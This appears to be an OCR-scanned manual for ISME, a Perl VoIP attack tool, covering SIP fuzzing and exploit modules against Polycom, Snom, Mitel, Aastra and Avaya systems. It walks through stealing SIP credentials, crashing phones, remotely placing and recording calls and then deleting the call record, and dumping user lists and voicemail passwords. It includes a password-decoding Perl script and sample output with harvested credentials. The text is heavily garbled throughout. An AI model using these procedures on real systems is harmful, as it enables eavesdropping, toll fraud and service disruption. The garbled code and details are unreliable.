- Yes (all fuzzing case): run the 4527 fuzzing castuded in protos sip.
- No (Select fuzzing cases): run only specific casdest a particular area.

Step 4.
If the running of all the tests has been select&es (all fuzzing case) - we could proceed
with the launching. Go to menu “File -> Launch fugsession”.

anem |\| SIP Fuzzing (protos)
File |

My 192.168.0.254 |
-~ Yes (Al fuzzing cases) ¥ No (Selected fuzzing cases)
[SIP-Method (1-193) X

Launch fuzzing session
Exit

Else, it is necessary to select the test caseskivatid be run by selecting it through the “Select
fuzzing method” menu.

SIP-Method (1-193) N
SIP-Request-URI (194-254) J
SIP-Version {253-329)

SIP-Via-Host (330-435)

31P-Via-Hostcolon (436-451) |
SIP-Via-Version {498-572)

SIP-Via-Tag {573-629)

SIP-From-Displayname {630-822)
SIP-From-Tay (823-879)

S1P-From-Colon {880-895) Z

Select fuzzing method:

Once the selection is done, launch the fuzzinguind'File -> Launch fuzzing session”.

Step 5: once the fuzzing session is terminated, have & twothe target to see if it's still
working properly...
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% SIP Fuzzing (proto;)

Target IP Address (192.168.1 .1):!192.168.0.254] |
Select fuzzing method:

~- Yes (Al fuzzing cases) ¥ No (Selected fuzzing cases)
SIP-Method (1-193) [X
SIP-Request-URI (194-254) l
SIP-Version (2535-329) m
SIP-Via-Host (330-433)
SIP-Via-Hostcolon {436-451)
SIP-Via-Version {498-572)
SIP-Via-Tag (573-629)
SIP-From-Displayname {630-822)
SIP-From-Tag {623-679)
SIP-From-Colon (860-895) Fi

Select fuzzing method:

Sending Test-Case #186
test-case #186, 572 bytes
Sending Test-Case #1587
i test-case #187, BED bytes
iISending Test-Case #1828
test-case #1988, 3548 bytes
Isending Test-Gase #189
test-case #189, 492 bytes
ISending Test-Case #190
| test-case #1890, 545 bytes
ISending Test-Case #1591
| test-case #1091, 2528 bytes
Sending Test-Case #1902
test-case #1092, 482 bytes
Isending Test-Case #193
test-case #193, 479 bytes

End of SIP fuzzing session

T

Note: running a sniffer (wireshark) on your computerlvpifovide the capacity to analyze

what is sent and what are the answers.

LTale) (N en0

File Edit View Go Capture Analyze Statistics Telephony Tools Internals Help

Info

ire (4120 bits), 515 bytes captured (4120 bits)
icc:c? (00:26:bb:56:cc:c2), Dst: Cisco b9:20:cl
P User Datagram Protoco src Dst Port: (5060)
= Session Initiation Protocol
P Request-Line: 4300 sip:sip@53.99.26.26 SIP/2.0
< Message Header
b Wia: SIP/2.0/UDP 44.190.62.13:5080;branch=29hG4bK0000133000132
P From: 133 <sip:isme@44.150.62.13>;tag=133

P To: Recelver =sip:sip@63.99.26.26=>
~nll

E_OO: 16:c7:bo:
62,99.26.26 (

Sk

Port: 31p.

sip (5060),

Tre. 15mAAA 1O0 ST 10

Eg N EHX@SlaeswTFI EE QAQAFE -
Filter: | j Expression... Clear Apply Enregistrer
Mo Time Source Destination Protocol (=]

@ |Frame (frame), 515 bytes {| Packets: 769 Displayed: 769 Marked: 0 Drop... }| Profile: Default
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10- Exploits

10.1- Polycom IP Phone Web Interface Data Diclosure Vulnerability

10.1.1-

Description

Vulnerability: Polycom IP Phone Web Interface Data Diclosure Vulnerability
0S¥DE-ID: 73117

EDE-ID: 17377

Date: 08,/06/2011

author: Pr0T3cTl0n

Wehsite Link: http:// mmw. polycon. com

Tested on Wersion: ALL

Patch: unknown

DATA DISCLOSURE :

The data disclosure wulnerability found in the section of 'Lines' -» 'Line 1°'
of 'Polycom IP Phone' software. The wulnerability allows the attacker to
disclosure the password of the username for the phone line that connected.

To exploit the wulnerability and discluse the data we need te access to the
'Polycom IP Phone' by this url ‘http:/faddress/regq 1 htm'.

Then we can see in the source code by the field 'reg. 1. auth. password' and then
we see the magic! thats is the password for the username by the sip server.
Now if we already hawe the sip server, usecname and password so we can connect
to it with any softphone and make our calls.

WORKAROUND

Diszhle the web interfaces as soon as possible.
Change default passwords.

Eeep IP Address priwate (public networks are to awvoid

— HTTP request on the vulnerable web page

Note: if administrator has handled the vulnerability tgh work around configuration, the
device may be still vulnerable to brute force. @t forget to test it.

10.1.2-

Using ISME to exploit the data disclosure

Step 1: To launch the attack interface, go to menu “Exple> Polycom SoundPoint IP
Phone: Web Gui Vulnerability”
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T

% | isme.pl (IP Phone Scanning Made Easy)

File History Flier Tools Expluitsl

Subnet to scan {192.168.1.0/24): I ____________________________________
Polycom SoundPoint IP Phone: Web Gui Vulnerability

Polycom SoundPoint IP Phones HTTP Denial of Service Vulnerability

Step 2:
Select either a subnet to scan or a single IP Phone
Enter the subnet (192.169.1.0/24) or a single |1Brésk (192.168.1.1).

A ™ M | Polycom SoundPoint IP "reg_1.html" Iﬁfﬁrm_at_ign Disclosure Vulnerability
‘ File I

# IP Subnet to scan

Enter subnet to scan (192.168.1.0/24): |63.99.26.DIZ4
~~ 3ingle IP Phone

IP Phone address to scan (192.168.1.1): |63.99.26.26

The script will try to ping the IP address as fstion. If the result is positive, it will move
forward and try to connect to the web server. QRlyAddresses that answer to ping will
appear in the results.

A ™ ™ |\| Polycom SoundPoint IP "reg_1.html" Iﬁfﬁrm_at_iqn Disclosure Yulnerability
‘ File |

# IP Subnet to scan

Enter subnet to scan (192.168.1.0/24): |53.99.25.Df24

~~ 3ingle IP Phone

IP Phone address to scan {(192.168.1.1): l63.99.2ﬂ82 |
HTTP: ;Response=HASH (0x100c06850) - *ercor_as HIML I

Error: Unable to get web page.
HTTP : :Response=HASH (0x100z06820) - »error_as HTML

Error: Unable to get web page.
HTTE : : Response=HASH (0x100cTef£8) - »error. as HTML

UserID: 1009835
UserPassword: 100

Polycom Soundpoint IP address:63, 99, 26 65
Erroc: Unsble to get web page.
HTTP : : Response=HASH (0x100cf2210) - rerror_as HTML

Erroc: Unable to get weh page.
HTTP: :Response=HASH (0x100b5d420) - »error_as HTML

Polycom Soundpoint IP address:63. 00,26 82

Step 3:Launch attack
go to menu “File -> Launch exploit”

M ™ O |\ Polycom SoundPoint IP "reg_l.html" Information Disclosure Vulnerability

| e |

Vulnerahility details

: 2.168.1.0/24): |
Launch exploit
Save scanh results
i (192.168.1.1): |53.99.26.26 |
| Exit
S A
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A positive result will provide UserID/Password amegjistrar.

Polycom Soundpoint IP address:63.99. 26. 26
UserID: 1009835

UserPassword: 100

Registrar: od.202.62.21

Step 4:Save results
Results appear in the bottom of the user interfBlexertheless, they can be saved to a text
file for a later analyze.

go to menu “File -> Save scan results”

M O M %] Polycom SoundPaint IP "reg_1.htm!" Information Disclosure Vulnerability

File

# IP Subnet to scan

Enter subnet to scan (192.168.1.0/24): |63.99.26 0sz4
- Single IP Phone

IP Phone address to scan (192.166.1.1): [53.99.76.254

I 8NN x| Save As E— S
Polycom Sour

{Ecror: Unsbl Directory: fUsersicedrichailletisme/user data _al

|H‘ITP: :Respor

Boiveen ol [163.99.26.26.04
Error: Unabl 07311704

HTTP - :Respor | [ Etrali IP Alive.t<t
4 | O] test main menutt b
Polycom Sour
Error: Unabl
HTTP: :Respoy

|[Polycon Sou.i:
[Erroc: Unabl I\J |
\IHTTP: :Respor

| 7 File name:l |‘ Save | ________
{Polycom Souy

#Ecror: Unabl
HITP: :Respon i85 of typs _'l cancal I

Polycom Soun T i "
Erroc: Unable to get weh page.
HTTP: :Response=HASH{0x1009fbfd8) —>error_as HTML

END

More information:
1- A class C subnet is scanned in 25 minutes on mypaten. Time depends of the
number of found web servers and their time to anseguests.
2- The implementation of threads may provide bettefopmance...

10.2- Polycom IP Phone Web Interface Denial of Service
10.2.1- Description

A M ) % Polycom SoundPoint IP Phanes HTTP Denial of Service Vulnerability

File |

IP Phone address (192.168.1.1): |

Vulnerability: Polycom SoundPoint IP Phones HTTP Denial of Service Wulnerability
OSVDB-ID: TORS7

Date 31/01/2011

Author: Pawel Gawinek

Yehsite Link: http:/farchives. nechapsis. com/archives/fulldisclosure /2011-01,/0495
html .

Dewices: SoundPoint IP models 320, 321, 330, 331, 335, 430, 450, 550, 560, EE0,&
70, 5000, &000, 7000

Patch: Awailable from polycom

Deny of serwice:

Polycom SoundPoint IP dewices (IP phones) are wvulnerable to Denial of Secvice
attacks. Sending HITE GET request with hroken Avthorization header effect a
dewice restart after ~60 seconds.
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10.2.2- Using ISME to exploit the DoS

Step 1: To launch the attack interface, go to menu “Exple> Polycom SoundPoint IP
Phone: HTTP Denial of Service Vulnerability”

206 % isme.pl (IP Phone Scanning Made Easy)
| File History Filter Tools Exploitsl |

Subnet to scan (192.166.1.0/24): [~~~ - - oo
| Polycom SoundPoint IP Phone: Web Gul Vulnerability

Polycom SoundFPoint IP Phones HTTP Denial of Service Vulnerahility

Step 2:Enter IP Address of the target

M ™ M 1\ Polycom SoundPoint IP Phones HTTP Denial of Service Vulnerability
File |

IP Phone address (192.168.1.1):|7143.74.219 |

Vulnerability: Polycom ScundPoint IP Phones HTTP Denial of Service Wulnersbility
OSVDE-ID: 70697

Date 3170172011

Author: Pawel Gawrinek

Wehsite Link: http: //archives. nechapsis. com/archives/fulldisclosure/2011-01/0495
chtml

Devices: SoundPoint IP models 320, 321, 330, 331, 335, 430, 450, EL50, 560, 650, 6
70, 5000, 6000, 7000

Patch: Available from polycom

Deny of service:

Polycom SoundPoint IF dewices (IP phones) are wulnerable to Denial of Service
attacks. Sending HTTP BGET request with broken Buthorization header effect a
device restart after ~60 seconds.

Step 3:Launch attack
go to menu “File -> Launch exploit”

A ™ M 1\ Polycom SoundPoint IP Phones HTTP Denial of Service Vulnerability

File |
"""""" B8.1.1):[714374219 |
Vulnerability detail:

Launch exploit m SoundPoint IP Phones HTTE Denial of Service Vulnerability|j
Exit

Step 4:wait for 60s, the device should have reboot ihesble.

M O O\ Polycom SoundPoint IP Phones HTTP Denial of Service Vulnerability
File |

IP Phone address (192.168.1.1):(714374.214 |

Launch exploit

IKilling charge sent.

Wait 60s for effect.

20 s

40 =

60 s

Wulnerahle dewice should hawe restart by now.

Note: If the connection to the device’s web interfacaimsuccessful, an error message will
appear.
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A 1 A\ Polycom SoundPoint IP Phones HTTP Denial of Service Vulnerability
File |

IP Phone address (192.168.1.1): [1.1.11] |

=

Launch exploit

Unzhle to connect. Job terminated

10.3- SNOM VoIP Phone Remote Call Place and Remote Tap

Description

Vulnerability: SMOM ¥WoIP Phone Remote Call Place and Remote Tap

Date: 10/09,/2010

author: Shawn Merdinger

Wehsite Link: http:/ /fwoipsa. org/blog/2010/09/07 fits-a-feature-remote-tapping-a-s
rnon-wolp-phone

DESCRIPTION:

Some Snom VoIP phones hawe a feature called -PCAP Trace- that allows, wia the we
b interface., the startfstop and download of = PCAP file on the Snom ¥oIP phone.
The Snom PCAP Trace feature does hawe limitations in that it the PCAP data is st
ored in a circular buffer because of memory limitations, and that ensbling PCAP
capture can impact the phoned’x{B03%x{%9}s performance (no surprise here). Still
, 1t 1s a scary feature that if not secured creates an attack wector where a rem
ote attacker can literally tap your phone.

To start/stop a PCAP on the Snom VoIP phone, one just clicks on the -Stact- or -
Stop- buttons on the phone webpage. After the capture is complete, an attacker c
an then download the PCAP trace and extract the audioc wsing Wireshark or the =ma
zing command-line RTPhresk by Michele Dallachiesa

So, combining the web page place call feature with the PCAP trace feature, an at
tacker can make a Snom ¥oIP phone call any mumber and then the attacker can capt
ure the call remotely on the Snom ¥oIP phone. For the final touch, an attacker c
an also delete the call record of the last call made, thereby wiping the apparen
t record of the call, at least on the Snom ¥oIP phone itself.

WORKAROUND

Disable the web interfaces as soon as possible

Change default passwords

Eeep IP Address priwate (public networks are to awoid)
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10.3.2- Run the exploit

Step 1:To launch the attack interface, go to menu “Exple® SNOM VoIP Phone Remote
Call Place and Remote Tap”.

ann | isme.pl (IP Phone Scanning Made Easy)
Fle History Filter Tools Exploits |

Subnet to scan 192.183.1.0!24:' L
¢ J Polycom SoundPoint IP Phone: Web Gui Yulnerability

Polycom SoundPoint IP Phones HTTP Denial of Service Yulnerability
SHOM VoIP Phone Remote Call Place and Remote Tap

Step 2:Enter IP Address of the target and phone numbealto

AOAO || SNOM VolP Phone Remote Call Place and Remote Tap
i |

Enter phone's IP address {(192.168.1.1): [199.234 84 229
Enter phone number to call: D033156554521|

Step 3:Launch attack
go to menu “File -> Launch exploit”

Ao || SNOM VolIP Phone Remote Call Place and Remote Tap
File |
____________ (192.168.1.1): I‘I 9972534 A4 229
Vulnerability details
all: |D033156554321] |
Launch exploit-
Save results 70IP Phone Remote Call Place and Remote Tap
Exit o |

The script may be able to connect to the embedddxserver, but if not authenticated (or the
connection is refused), things won’t go furtherthis case, log files will be created but will
be empty (zero or just a few octets).

¥ | user_data aujourd'hui, 23:07 Dossier -
v |  logz 213.157.83.54 aujourd'hui, 22:44 Dossier -

& del_call_leg.html aujourd'hui, 23:05 HTML Document 950 octets

& place_call.html aujourd'hui, 23:04 HTML Document 950 octets

@ start_pcap.html aujourd'hui, 23:04 HTML Document 050 octets

& stop_pcap.html aujourd'hui, 23:05 HTML Document 950 octets
trace_213,157.83.54. pcap aujourd'hui, 23:05 Document 0 octets

Note: considering the many phones that | havedesthink reasonable to consider than most
phones have been patched. Nevertheless, the scipéresting to test Voice IPS.
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If an authorization is needed or the Connectionsedl by the host the ollowing log will come
up.

AN ) SNOM VolIP Phone Remote Call Place and Remote Tap
File I

Enter phone's IP address (192.168.1.1): |1 091701668172
Enter phone number to call: IDDSS‘I SEEE4321]
——————————————————————————————— STBRT —c—-—-—o—m—smmommmmeo oo T

--Making logz directory

--Starting Taj

--2012-08-13 22:34:35-~ http: /7109 170 168 172 pcap htm

Connexlon wvers 109.170.168.172:80. . cormecths. )

requiite HTTP transmise, en attente de la réd@ponse. . 401 Unauthorized
A%x{B9ICHEC d'autorisation.

--Placing call

--2012-09-13 22:34:35-- http://100, 170 168 172/

Connexion vers 109.170.168.172:80. . . connecti®

requiiite HTTP transmise, en attente de la rdéponse . 401 Unauthorized
A%< {B9ICHEC d'avtorisation.

--5leeping 30 seconds

--stopping Tap

--2012-09-13 22:35:06-~ http: /7109 170 168 172/ pcap. htm

Connexion vers 109 170 168 172:80 . cormectis.

requiite HTTP transmize, en attente de la rA@ponse.. 401 Unanthorized
AMc{BYCHEC d'autorisation.

-- Grabbing call capture pcap from target phone

--2012-09-13 22:35:06—— http: /71090170, 168, 172/ trace. peap

Comnexion vers 109.170.168.172:80. .. cormectis,

requAlte HTTP transmize, en attente de la rA@ponse. . 401 Unanthorized
A%:{BYYCHEC d'autorisation.

-- Deleting the call record from the phone web interface

--2012-09-13 22:35:06-- http;/ /108 170,168 172 adr, htn?dialeddel=1

Note: if rtpbreak and sox are installed on the PC rugitie exploit, a wav file can be
extract from the pcap file automatically.

1- Go to “Exploits”

2- Open in a text editor “snom_call_tap.sh”

3- Uncomment lines 50 to 71

5@ ##run ritpbreack to extroct the audic from the pcap

51 ##obtain rtpbreak From here: http://dallachiesa.com/code/ripbreaks

52 ##rtpbreak has dependencies detoiled here: http://dallechiesao, comfcode/rtpbreak/doc/ripbreak_en.html
53 ##rtpbreak on Ubuntu requires libnetl, libnetl-dev, libpcap®.?, libpcap®.?-dev

54

55#% echa " "

56 # echo Dumping audio from pcap file
57 # echo "

58 # rtpbreak -P2 -t108 -T18@ -d logz_%$1 -r logz_3%1/trace_%1.pcap

to convert the extracted aqudio to wav Format

62 # echo Converting to wav
64 # echo "

65 # sox -r8008 -cl -t ul logz_$1/rtp.@.0.raow -t wav logz_$1/@.wav

66 # sox -rE0B@ -cl -t ul logz_%$1/rtp.@.1.row -t wav logz_%$1/1.wav

67 # sox -m logz_%$1/0.wav logz_%$1/1.wav call_%$1.wav

68

6% # echo " "

7@ # echo Complete -- wou can listen to the coptured call ot call_%$1.wawv
71# echa "
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10.4- Mitel AWC: Unauthenticated command execution

10.4.1- Description

Vulnerability: Unauthenticated command execution within Mitel's AWC
OSYOE-ID: 69934

EDE-ID: 15807

Date: 2271272010

Author: Procheckop

Website Link: http: ffwmmwr. esploit-dhb. comdexploits A5807 7

Patch: wes

DESCRIPTION:

Mitel aundio and Web Conferencing (AWC) is a simple, cost-effective and
scalable audio and web conferencing solution supporting upto 200 ports.
ProCheckUp has discowered that the AWC web uwser interface i1z wvulnerable
to =n uwnauthenticated command execution attack.

Command execution allows Unix commands to be remotely executed with the
permissions associated with the web service account. No authentication
1s required to exploit this sulnerability

WOREAROUND

Ensure that the latest patches hawve been installed.

10.4.2- Run the exploit

Step 1: To launch the attack interface, go to menu “Expler Mitel awc: Unauthenticated
command execution”.

~ oy

% | isme.pl (IP Phone Scanning Made Easy)

File History Flter Tools Ezploits

Polycom SoundPoint IP Phone: Web Gui Vulnerability

Polycom SoundPoint IP Phones HTTP Denial of Service Yulnerability
SNOM VoIP Phone Remote Call Place and Remote Tap

Gsco |P Phone 7940 (3 SIP messages) Remote Denial of Service Exploit

Subnet to scan (192.168.1.0/24): [

Mitel AWC: Unauthenticated command execution

Step 2:Select the type of information and enter AWC IRIAass of the target.

Aanm x| Mitel AWC: Unauthenticated command execution
File

% User list
~~ Directory list
Enter AWC IP Address (192.168.1.1): !192.158.20.56

Step 3:Launch attack
go to menu “File -> Launch exploit”

MO x| Mitel AWC: Unauthenticated command execution

File | |

Vulnerability details

Launch exploit
92.168.1.1): i192.168.20.5€|
Save results L
| Exit 1enticated command execution within Mitel's AWC |_I
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IF the server is not vulnerable, you should seekimal of message come up:

ann | Mitel AWC: Unauthenticated command execution

File |

# Userlist
-~ Directory list
Enter AWC IP Address (192.168.1.1): I‘I 92.168.0.254 |

Mitel AWC IP address:192 168.0.254
Error: Unable to access the web portal.
HTTP: :Response=HASH(0x100cdccal) -rerror_as HIML

(RO [%| Mitel AWC: Unauthenticated command execution

File

# User list
~ Directory list
Enter AWC IP Address (192.168.1.1): |1 32.168.20.56

Mitel AWC IP address:do not answer to ping.
Exploit could not he launch.
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10.5- Aastra SIP Phone: Web GUI information disclosure

10.5.1- Description

Wulnerability: Polycom IP Phone Weh Interface Data Diclosure Vulnerability
OSVDE-ID: 72941

EDE-ID: 17376

Date: 08/06/2011

Author; ¥akic Wizman

Wehsite Link: http: /Amme sastoa. com

Tested on Wersion: 551, 67574, 91431, 94801

Patch: unknown

DATA DISCLOSUEE:

The data disclosure wulnersbility has beesn found in the section of 'Global SIP'
of Aastra IP Phone software. The wulnerability allows the attacker to disclose
the password of the SIP profile that is vsed to connect to ISP or PBE,

To exploit the wulnerability and diclose the data we need to access the web GUI
by through this url http:/faddressglobalSIPsettings. html, or this one

fhttp: /faddressSIPsettingslinel html. we now have Caller ID, Authentication,
{Name, and Password. By editing the source code. we are able to see account
name, password and SIP registrar fields in clear.

A1l the needed information to sppof the identity of the user are awailable ...

|{WORKAROUND

Diszble the weh interfaces as soon as possible:
[Change default passwords.

iKeep IP Address private (public networks are to avoid)

10.5.2- Run the exploit

Step 1: To launch the attack interface, go to menu “Expler Aastra SIP Phone: Web Gui
Data Disclosure”.
"AA M\ isme.pl (P Phone Scanning Made Easy) |
|F|Ie History Filter Tools Exploitsl |l

Subnet to scan (192.168.1.0/24: -~ - oo oo o0 o e
Aastra SIP Phone: Web Gui Data Disclosure

Alcatel-Lucent 0X0: FTP Denial of Service

Mitel AWC: Unauthenticated G i Execution

Polycom SoundPoint IP Phone: Web Gui Data Disclosure

Polycom SoundPoint IP Phones HTTF Denial of Service Vulnerability
SNOM VolP Phone Remote Call PFlace and Remote Tap

Step 2:

Select the type of target (single or subnet) agtlpassword type (default or specific).
anmn i_\i Aastra IP Phone Information Disclosure Vulnerability
| File |

« IP Subnet to scan with default login/password
Subnet (192.168.1.0/24): |
% Single IP Phone to scan with default loginfpassword
IP Phone address (192.168.1.1): i
~ Single IP Phone to scan with specific login/password
IF Phone address (192.168.1.1): I
IP Phone login: |

IP Phone passwiord: |

Step 3:Enter information regarding IP address, subnefardgin/password.

4% Single IP Phone to scan with specific loginfpassword
IP Phone address (192.168.1.1): |E4.ZD‘I Jd7.144

IP Phone login: acdmin

IP Phone password: zzzed
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Step 4:launch the exploit (go to menu “File -> Launch lext)

AN i_‘_\; Aastra IP Phone Information Disclosure Vulnerability ]

| e |

"""""" th default login/password
Vulnerahility detalls I

Launch exploit

an with default login/password
Save scan results ;
- 8.1 1 ¥ _ _

Error message that could arise

IP Phone seems to be down (retry a second timeireetisat it's not a timeout due to some

delay).

Aastra phone IP address:ed. 201,187, 240
Error: Unable to get web page.
-rerror_as_HIML

Step 6:analyze results

[ V) || Aastra IP Phone Information Disclosure Vulnerability

File

~- IP Subnet to scan with default login/password
Subnet {192.168.1.0/24): |

~ Single IP Phone to scan with default login/password
IP Phone address (192.168.1.1): i

4 3ingle IP Phone to scan with specific loginfpassword
IP Phone address (192.168.1.1): I64.201 87144

| IP Phone login; admin

IP Phone password: Zezee

o

Azstra phone IP address:64. 201.187. 144
glohal SIP parsmeters:

Caller ID: 2413330435

Authentication name:sastraldb
Password: password

Proxy server: as. iopl.broadworks. net
Registrar server: as. lopl.broadworks. net
{IP line (1} parameters:
Authentication name:
Password:

Proxy serwver: 0.0:0.0

Note: do not forget to save the (“File-> save scan te%ak usual).
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10.6- Avaya Ip Office Linux TFTP data disclosure

10.7.1- Description

Avaya IPDL

o e

o Connectto TFTP service and ask for specificfiles

o Get the files and analyze them

10.6.2- Run the exploit

Step 1: To launch the attack interface, go to menu “Expler Avaya IPOL: TFTP Data

disclosure”.

Step 2:Enter IP address and select the kind of infornmayiou wish to get.

HO00

|\ Avaya IP Office Linux TFTP data disclosure

File

IP Office Linux IP Address (192.168.1.1):

Select infonmation type to retrieve:

17216.1.246

User List ry
Extension List

Call List

Voicemail Password || /

Step 3:Launch the attack and exploit the results
|\ Avaya IP Office Linux TFTP data disclosure

fanon

|

Launch attack
Save results
Exit

Date: 15/11/2012
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System informations

MmMNO 1\, Avaya IP Office Linux TFTP data disclosure

‘ File

IP Office Linux IP Address (192.168.1.1):  [172.16.1.2468

System Informations ||

_ : Ay User List J
Select information type to retrieve: Extension List
Call List i
N R I i A
Launch attack - System Informations
nac="ed4115h12d7he" type="IP0-Linux-PC" class="CPU" icon="0" ver="8.1.91 (6)" nam
e="5STN PRIMAIRE" licensed="6" requiredLicense="g"
state="3"
___________________________________ A e e G e B e e e o e el
Extension list
[T YaYe) [\ Avaya IP Office Linux TFTP data disclosure
File

IP Office Linux IP Address (192.168.1.1): |1 TZ16.1.246

System Informations
Select information type 1o retrieve: datniliat J
elect information type io retrieve: Extension List
Call List /
Launch attack - Extension List

122, DBOGSER027A411DER68ARE4115E1 2DTEE
121, r4a2778027241 1DES658EE411581 2DTEE
123, an21E00027AE11DES0T6E4115E1 2DTEE

END

Date: 15/11/2012 By Cedric Balillet Page 63



ISME v0.7

User list

I Nala) | Avaya IP Office Linux TFTP data disclosure
File

IP Office Linux IP Address (192.168.1.1): i1 T216.1.246

System Informations
: ) - UserList J
3elect information type to retrieve: Extension List
Call List F

Launch attack - User List

Durznd, 122, , DE0EEBE027A4110E868FE4115B1207EBE
Dupont, 121, , F4a277802734110B868FE4115E1ED TRE
Rouger, 123, , 65946A0027AE1 1DES068E4115B120TEBE

END

Voicemail password

If successful, the script will ask for a directdoysave the password file and confirm that the

exploit is successful.

AM

%/ Avaya IP Office Linux TFTP data disclosure

| File
IP Office Linuz IP Address (192.168.1.1): |17216.1.246
User List
2 " S Extension List
Select information type to retrieve: call List
Vnicemail Passward |1 ¢
800 [| Save As %
i h att: =
e Directory: fUsersfcednchailletismefuser_data —_ | ________
[ aastra.t=t ] vmaldtst
[ e bt
[ dnsresolvert 00.txt
[ poly com .t

[ test main menu bt
[ wmail172.16.1.246 b=t
[ vmalz =t

|\| I=

File name:' | Save |

—_ | Cancel |

Launch attack - Voicemail Password

Woicemail password file successfully created in /Users/cedrichaillet/isme/user_d
atawmaild. txt

_____ EHD - 2 2 2 2

Once done, it is necessary to edit voicemail fidimd the information (I did not know yet

how to edit it through script. Strange format, tsmust be handmade).
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xNoUserb-6B2z'U

a[=%
YY1k 280200 \b8dALS IPDefaul t SIPDefaul tSIPDefaulth
byyiya!bab<b

4 abyyyya=b.Unknownh b

. AéDurandl2?] VE2Zh321D-6RestreintDupontDupontd[ ‘& xk

5 -8yyyyyyyyyik¥@6717107305yv5?807aalb&dA1220urand122b

« byyyvtsalbab<b

6 ab¥yvya=b.Unknownh

. .ﬁaDupont@ V~nProtegeo¢w nila =X

7 -BYyYVIYYY1kE0672805150755% 78D?aa\b8dA&+33148037168Dupont+33148037160b
+ byyyytsalbab<b

8 ab%yya=b.Unknownh b

. RaRougerBDF-123 vE23582b-50upontDuponte] ' B0ha[xk

9 .&6Pte,

. "[yyyyik\yyyy?8D?aalb&dA123Rouger123b

. byyyvtsalbabeb

= R

18 ab\yya=b.Unknownh b
- A
[] User extension [ Voicemail password

Other information to exploit: “config/password »

Returns binary config of station. Password mustitieoded with the following script.

#!/ usr/ bi

in/perl -w

$s = $ARGV[ 0] ;

$psl = "
$ps2 = "

# $PASS:
# 0x10
# Ox11

$PASS1
$PASS?2

for ($i

}

for extension
for system unit

0x10;
Ox11;

=0; length($s) !'= 0; $s = substr($s,1)) {

$c = unpack("C', $s);
$nc = $c + $PASS1 - $i;
$psl .= pack("C', $nc);
$nc = $c + $PASS2 - $i;
$ps2 .= pack("C', $nc);
$i ++;

print "User password: $psl\nStation password: $ps2\n";
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Features to come

Implement multi threading to gain in efficiency

Implement SIP UA to get:

- SIP Option

- SIP user agent information

Support ip phone 7921 (miss a proper html codeyairgg), etc ...
Implement Cisco Ringer & Forwarder in SIP

Voiper GUI

AASTRA IP phone line password.

Insert the capacity to stop a scan on Aastra/Paly8dOM brute force.

Cisco extension mobility brute force.
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Annex A- Limitation due to Cisco IP Phone language and how to
overcome it

Right now, ISME has been test on some French agtidirmodel of Cisco IP Phone. Since
the informations are gathered by analyzing the HTddtde, the keywords will be false if it's
Spanish. Nevertheless, it could be easely bypassdding of few lines in the sub function
“AnalyzeHTML” of ISME script.

AnalyzeHTML function is mainly regular expressianfind the right keyword.
Step 1:connect to a Cisco IP Phone web interface (hiffpatidress) and ask for html source
code,

Step 2: Add a new elsif case with a copy/past

499 sub AnalyzeHTML

491 {

492 flScontent =~ /Model Number<\/Bs<\/TD=\W?<td width=20><\/TO>\W?<TD><B>{[\+\/0-9A-Za-2-J+)<\/B><\/TD=/)
493 {

4094 # working out model type if the web page is in english

495 3IPPhone_Type = $1;

496 # print "IP Phone type: $1\n";

497 }

498 elsif(lcontent =~ /Model Number<h\/B=<\/TD=\W\W<td width=20><\/TD=\W\W<TD><B><strong>{ [\ \/B-0A-Za-z-J+)<\/strong=<\/B><\/TD>/)
439 {

509 # working out model type if the web page is in english

581 $IPPhone_Type = §1;

582 # print "IP Phone type: $1\n";

503 }

504 eleif{fcontent =~ /Numéro du modéle<\/B><\/TD="\W?<td width=20><\/TO>WW2<TD><B>([\+\/0-0A-Za-2-]4)<\/B><\/TD>/)
505 {

586 # working out model type if the web page is in french

a7 $IPPhone_Type = $1;

cas #print "IP Phone type: $1\n";

509 }

518 else

511 {

512 $IPPhone_Type = "Unknown";

513 # print "IP Phone type: Unknown\n";

514 }

Step 3: replace with the right keyword in Spanish langualyreover, if you are an
experience user in regular expression you may émdra better way to do the job than what
I've come out with.

Step 4:Do it for every item the script is looking at.

Step 5:same thing as step 1 to 4 for FIND_SERVERS subtion.
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Annex B- How is ISME determining an open UDP Port ?

Determining if a UDP port is open or not is notemsy as with TCP. | am doing it by
verifying if | get an ICMP unreachable when tryitige UDP port. If it is the case the port is
close, else, he is open or the ICMP unreachablddéas filtered...

There may be more effective ways but | do not kmbwhem. Anyway, here is my code for
further analysis.

#---UDP SB6B-----------m--
my Ficmp_timeout=2;

my $icmp_sock = new I0::Socket::;INET(Proto=>"icmp");
my $read_set = new I0::5elect();
Yread_set->add{$icmp_sock);

my $buf="hello";

my $sock = new ID::Socket::INET(
PeerAddr=>iAddress_alive,
PeerPort==>"50868" ,
Proto=>"udp");

# Send the buffer and close the UDP socket.
fsock-=send("$buf");
close{$sock);

# Woit for incoming pockets,

(inew_readable) = I0::5elect-»select(iread_set, undef, undef, $icmp_timeout);
# Set the arrival flaeg.

$icmp_orrived = "@";

# For every socket we hod received packets (In our case only one - icmp_socket)
foreach $socket (@%new_readablie)
{
# If we have captured an icmp pockoges, 1ts probably "destination unreachable"
iLf ($socket == $icmp_sock)
{
# Set the flog and clean the socket buffers
$icmp_arrived = "17;
Sicmp_sock->recv{ibuffer,58,8);
1
1
if ( $lcmp_arrived == "@" )
i
# print that UDP port 5BE0 has been found.
$portS@6AUDP Ffound=1;
¥

# Close the icmp sock
close($icmp_sock);
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585 sub FIND_SERVERS

586 {
587
14

# this url contains most servers ip oddress.
my $Url_Detection_TFTP="http://".3Address_ali
my $Url_Detection_TFTP2="http://".$Address_olive."14/NetworkConfiguration";

my $request_tftp = new HTTP::Request('GET', $Uri_Detection_TFTP};
my Sresponse_tftp = $uo->reguest{$request_tftp);
my $content_tftp = $response_tftp->content();

#print "CEDRIC CONTENT TFTP:iScontent_tftp\n"
if ($content_tftp =~ JError 484: Not Found/s)

{
$request_tftp = new HTTP::Reguest('GET', $Url_Detection_TFTP2);
$response_tftp = Jua-»request{$request_tFftp);
$fcontent_tftp = $response_tftp->content();

¥

if (hcontent_tftp =~ /Serveur TFTP 1le\/B><N\/TDr<td width=20><\/TD><TD><B>([@-9.0-zA-Z]4)<\/B><N/TD>/)

i
$TFtp_server_IPF = §1;
&TFTR,

-1 F (Scontent_tftp =~ STFTP Server 1<\/B><\/TD><td widbth=20><N/TD=<T0><B=([@-9.0-zA-7]4)=\/B=<"/TD>/)

e e
in

$Tftp_server_IP = §1;
&TFTR;

elsif (Scontent_tftp =~ /TFTP Server l<\/b=<\/td>\W\W<td width=20=<\/td>\W\W<td><b>([0-9.]4+3<\/b><\/td>/)

fTFtp_server_IP = §1;

&TFTR;
Ey
